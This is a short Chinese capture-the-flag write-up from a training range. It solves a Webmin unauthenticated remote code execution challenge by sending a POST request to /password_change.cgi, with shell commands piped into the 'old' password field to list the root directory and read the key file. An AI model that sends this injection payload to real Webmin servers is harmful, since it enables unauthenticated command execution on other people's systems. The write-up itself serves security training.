Webmin未经身份验证的远程代码执行

[墨者学院]——Webmin未经身份验证的远程代码执行

做题前看看大佬写的漏洞原理：[https://blog.csdn.net/qq_43380549/article/details/100011292]

漏洞描述：Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。据统计，互联网上大约有13w台机器使用Webmin。当用户开启Webmin密码重置功能后，攻击者可以通过发送POST请求在目标系统中执行任意命令，且无需身份验证。

既然是发送POST请求达到任意执行，而且无需身份验证想到的肯定是bp抓包。

根据漏洞的原理我们修改下面几个地方

修改post请求路径改为 /password_change.cgi
user=hhh&pass=&expired=2&old=test1 | ls /&new1=test2&new2=test2

发现key.txt，构造user=hhh&pass=&expired=2&old=test1 |cat /key.txt&new1=test2&new2=test2即可获得key。